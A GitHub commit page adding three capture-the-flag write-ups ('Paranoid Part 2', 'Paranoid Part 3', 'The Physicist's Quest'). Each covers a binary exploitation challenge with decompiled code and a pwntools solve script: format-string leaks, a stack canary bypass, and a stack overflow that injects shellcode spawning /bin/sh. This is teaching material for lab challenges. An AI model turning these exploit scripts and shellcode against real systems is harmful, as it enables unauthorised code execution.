-
Notifications
You must be signed in to change notification settings - Fork 2
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
5ce89dd
commit 1925cb3
Showing
18 changed files
with
595 additions
and
2 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,148 @@ | ||
+++ | ||
title = "Paranoid Part 2" | ||
date = 2024-07-02 | ||
authors = ["Abhinav I S"] | ||
+++ | ||
|
||
first, we will run checksec on the binary | ||
|
||
```bash | ||
checksec --file=challenge | ||
``` | ||
<br> | ||
{{ img(id="image1.png", alt="Alt Text", class="textCenter") }} | ||
|
||
Opening the binary in a decompiler (Ghidra) and looking at main function gives | ||
|
||
```c | ||
|
||
void main(void) | ||
|
||
{ | ||
undefined local_68 [48]; | ||
char local_38 [48]; | ||
|
||
banner(); | ||
puts( | ||
"\nHey its Anonymous again...Someone leaked my temporary location to the FBI and they sent an agent to the location I provided them" | ||
); | ||
puts("\nIt\'s no longer safe to provide you the address of our temporary meeting point."); | ||
puts("\nI\'m gonna have to hide and lay low for a while..."); | ||
puts("\nTry reaching out to me after things have settled down"); | ||
printf("\nGive me a name so that I can identify you if and when you contact me: "); | ||
fflush(stdout); | ||
read(0,local_38,0x23); | ||
printf("\nAlright Mr. "); | ||
printf(local_38); | ||
printf( | ||
"\nI\'ll look forward to doing business with you...Till then, is there anything that you wou ld like to convey? " | ||
); | ||
fflush(stdout); | ||
read(0,local_68,0x110); | ||
return; | ||
} | ||
``` | ||
Analyzing other functions, | ||
there seems to be a suspicious function safe_house | ||
```c | ||
void safe_house(void) | ||
{ | ||
char local_98 [136]; | ||
FILE *local_10; | ||
local_10 = fopen("flag.txt","r"); | ||
if (local_10 == (FILE *)0x0) { | ||
puts( | ||
"\nThere is no \'flag.txt\' present in this directory. Please create sample flag for local e xploitation." | ||
); | ||
/* WARNING: Subroutine does not return */ | ||
exit(0); | ||
} | ||
fgets(local_98,0x80,local_10); | ||
printf(local_98); | ||
putchar(10); | ||
fflush(stdout); | ||
/* WARNING: Subroutine does not return */ | ||
exit(0); | ||
} | ||
``` | ||
|
||
clearly, we have to return to this function | ||
|
||
there is a printf and two read function calls. | ||
We can exploit a format string vulnereability to leak addresses from the stack, and calculate address of safe_house, since PIE is enabled | ||
|
||
first step is to figure out the offset for the printf format string to print out addresses in the code section | ||
|
||
starting the binary in gdb, and disassembling main, we find that addresses likely in the text section start with 0x5555555 | ||
|
||
<br> | ||
{{ img(id="image2.png", alt="Alt Text", class="textCenter") }} | ||
|
||
setting a break point at the first printf, and printing the stack | ||
|
||
<br> | ||
{{ img(id="image3.png", alt="Alt Text", class="textCenter") }} | ||
|
||
we can see that %21$lx prints out the address of main | ||
|
||
Next, we need to calculate the address of safe_house | ||
from ghidra, we can see that the address of safe_house is 0x010125a, | ||
and address of main is 0x0101316 | ||
|
||
So, address of win is main - 188 | ||
|
||
We can create our solve script, overflowing the buffer, RBP, into the return address | ||
|
||
```python | ||
#!/usr/bin/env python3 | ||
|
||
from pwn import * | ||
|
||
exe = ELF("./challenge") | ||
|
||
context.binary = exe | ||
# context.log_level = "debug" | ||
|
||
def conn(): | ||
if args.LOCAL: | ||
r = process([exe.path]) | ||
if args.DEBUG: | ||
gdb.attach(r) | ||
else: | ||
r = remote("rvcechalls.xyz", 27250) | ||
|
||
return r | ||
|
||
|
||
def main(): | ||
r = conn() | ||
r.recv() | ||
r.sendline(b"%21$lx") | ||
data = r.recv() | ||
lines = data.split(b"\n") | ||
main = lines[1].split(b".")[1].lstrip(b" ") | ||
print(main) | ||
win = int(main,16) - 188 | ||
print(hex(win)) | ||
payload = b"A"*0x68 + p64(win+1) | ||
r.sendline(payload) | ||
print(r.recv()) | ||
r.interactive() | ||
|
||
|
||
|
||
|
||
if __name__ == "__main__": | ||
main() | ||
``` | ||
|
||
giving the flag | ||
|
||
``` | ||
flag{Mr_S0-c4ll3d_4n0nym0u5_ha5_l04d5ss_0F_53cUr1Ty_155u35_1907e55351f} | ||
``` | ||
|
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,111 @@ | ||
+++ | ||
title = "Paranoid Part 3" | ||
date = 2024-07-04 | ||
authors = ["Abhinav I S"] | ||
+++ | ||
|
||
First, we run checksec | ||
<br> | ||
{{ img(id="image1.png", alt="Alt Text", class="textCenter") }} | ||
|
||
<br> | ||
|
||
```c | ||
void main(void) | ||
|
||
{ | ||
long in_FS_OFFSET; | ||
char local_68 [48]; | ||
undefined local_38 [40]; | ||
long local_10; | ||
|
||
local_10 = *(long *)(in_FS_OFFSET + 0x28); | ||
banner(); | ||
puts("\nOkay Its getting serious now. Somehow I now suck at hiding my actual address."); | ||
puts("\nHence, I\'ve now decided to keep one of the strongest security guard on watch"); | ||
puts("\nHe will make sure that no one gets in and collects any evidence against me"); | ||
puts("\nHe\'s no ordinary guard I tell ya...The FBI fear him!"); | ||
printf("\nCan you guess who he is?: "); | ||
fflush(stdout); | ||
read(0,local_68,0x23); | ||
printf("\nReally? you couldn\'t think of anyone better than "); | ||
printf(local_68); | ||
printf( | ||
"\nTill we meet again then my old friend...Give me your final message. You will likely not s ee me now for a long time: " | ||
); | ||
fflush(stdout); | ||
read(0,local_38,0x120); | ||
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) { | ||
/* WARNING: Subroutine does not return */ | ||
__stack_chk_fail(); | ||
} | ||
return; | ||
} | ||
``` | ||
looking at the other functions, there is a safe_house function which we need to return to. The difference from paranoid part 2 is the existence of [a stack canary](https://ctf101.org/binary-exploitation/stack-canaries/) | ||
opening the binary in GDB, examining addresses of RBP, and the value that gets printed from the stack, we can calculate the offset to the canary, and the address of main | ||
1. give input %7$lx, the value that gets printed out is 0 | ||
2. examine stack and value of rbp | ||
<br> | ||
{{ img(id="image2.png", alt="Alt Text", class="textCenter") }} | ||
3. clearly the canary is at %17$lx and the address of main is at %21$lx | ||
Now, we can write the solve script | ||
```python | ||
#!/usr/bin/env python3 | ||
from pwn import * | ||
exe = ELF("./challenge") | ||
context.binary = exe | ||
context.log_level = "debug" | ||
def conn(): | ||
if args.LOCAL: | ||
r = process([exe.path]) | ||
if args.DEBUG: | ||
gdb.attach(r) | ||
else: | ||
r = remote("rvcechalls.xyz", 33545) | ||
return r | ||
def main(): | ||
r = conn() | ||
r.recv() | ||
r.sendline(b"%17$lx.%21$lx") | ||
data = r.recvuntil(b"better than ") | ||
data = r.recv() | ||
addresses = data.split(b"\n")[0] | ||
canary = addresses.split(b".")[0] | ||
main = addresses.split(b".")[1] | ||
# r.recv() | ||
win = int(main,16) - 211 | ||
payload = b"A"*0x28 + p64(int(canary,16 ))+ b"B"*8 + p64(win) | ||
r.sendline(payload) | ||
r.recv() | ||
# good luck pwning :) | ||
r.interactive() | ||
if __name__ == "__main__": | ||
main() | ||
``` | ||
|
||
gives us the flag | ||
<br> | ||
|
||
``` | ||
flag{Th15_pUnY_6u4rd_aint_S70pp1n_m33_1907ebe25bf} | ||
``` |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
121 changes: 121 additions & 0 deletions
121
content/writeups/RVCExIITBFinals/physicistquest/index.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,121 @@ | ||
+++ | ||
title = "The Physicist's Quest" | ||
date = 2024-07-04 | ||
authors = ["Abhinav I S"] | ||
+++ | ||
|
||
First, we run checksec on the binary | ||
|
||
```bash | ||
checksec --file=challenge | ||
``` | ||
|
||
<br> | ||
{{ img(id="image1.png", alt="Alt Text", class="textCenter") }} | ||
|
||
NX disabled indicates we can execute from stack, hence this is likely a shellcode injection challenge. | ||
|
||
Now, opening in a decompiler (Ghidra): | ||
|
||
```c | ||
|
||
undefined8 main(void) | ||
|
||
{ | ||
int local_70; | ||
int local_6c; | ||
undefined local_68 [92]; | ||
uint local_c; | ||
|
||
fflush(stdout); | ||
puts("Hi you know my buddy"); | ||
puts("He\'s stuck with his research on string theory"); | ||
puts( | ||
"He\'s too proud to admit it, but he needs your help. But first you will need to prove that yo u are worthy enough for this" | ||
); | ||
puts("enter two magic numbers"); | ||
__isoc99_scanf(&DAT_001020e1,&local_6c); | ||
__isoc99_scanf(&DAT_001020e1,&local_70); | ||
if ((-1 < local_6c) && (-1 < local_70)) { | ||
local_c = local_70 + local_6c; | ||
printf("Your magic value is %d\n",(ulong)local_c); | ||
if ((int)local_c < 0) { | ||
puts( | ||
"Good job! Now you need to figure out my location so that I can trick my friend into meeti ng you" | ||
); | ||
printf("Meet us in secrecy at %p\n",local_68); | ||
read(0,local_68,200); | ||
} | ||
return 0; | ||
} | ||
printf("BAZINGA! Close but not close"); | ||
/* WARNING: Subroutine does not return */ | ||
exit(0); | ||
} | ||
``` | ||
ok , if local_6c and local_70 are positive and their sum is negative, we can write into a buffer, and the address of this buffer is printed out. | ||
The first if conditions can be achieved by [Integer Overflow](https://en.wikipedia.org/wiki/Integer_overflow). | ||
Now, we put shellcode in the buffer and overwrite the return address with the address of the buffer (the shellcode). | ||
We can create our solve script: | ||
```python | ||
#!/usr/bin/env python3 | ||
from pwn import * | ||
exe = ELF("./challenge") | ||
context.binary = exe | ||
# context.log_level = "debug" | ||
def conn(): | ||
if args.LOCAL: | ||
r = process([exe.path]) | ||
if args.DEBUG: | ||
gdb.attach(r) | ||
else: | ||
r = remote("rvcechalls.xyz", 29639) | ||
return r | ||
def main(): | ||
shellcode = b"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05" | ||
r = conn() | ||
r.recv() | ||
r.sendline(b"2147483645") | ||
r.sendline(b"10") | ||
data = r.recv() | ||
print(data.split(b" ")[-1]) | ||
win = int(data.split(b" ")[-1], 16) | ||
print(hex(win)) | ||
payload = shellcode + b"A"*(0x68-48) + p64(win) | ||
# good luck pwning :) | ||
r.sendline(payload) | ||
r.interactive() | ||
if __name__ == "__main__": | ||
main() | ||
``` | ||
|
||
note that we need an additional 0x68-48 bytes to reach the return address since the shellcode is 48 bytes long. | ||
Shellcode was obtained from a [Shellcode Database](https://shell-storm.org/shellcode/index.html) | ||
|
||
Running the script spawns a shell, and we can print out the flag | ||
|
||
<br> | ||
{{ img(id="image2.png", alt="Alt Text", class="textCenter") }} | ||
<br> | ||
|
||
``` | ||
flag{Gre4t_Y0u_h3lp4d_h1m_TBBT} | ||
``` |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Oops, something went wrong.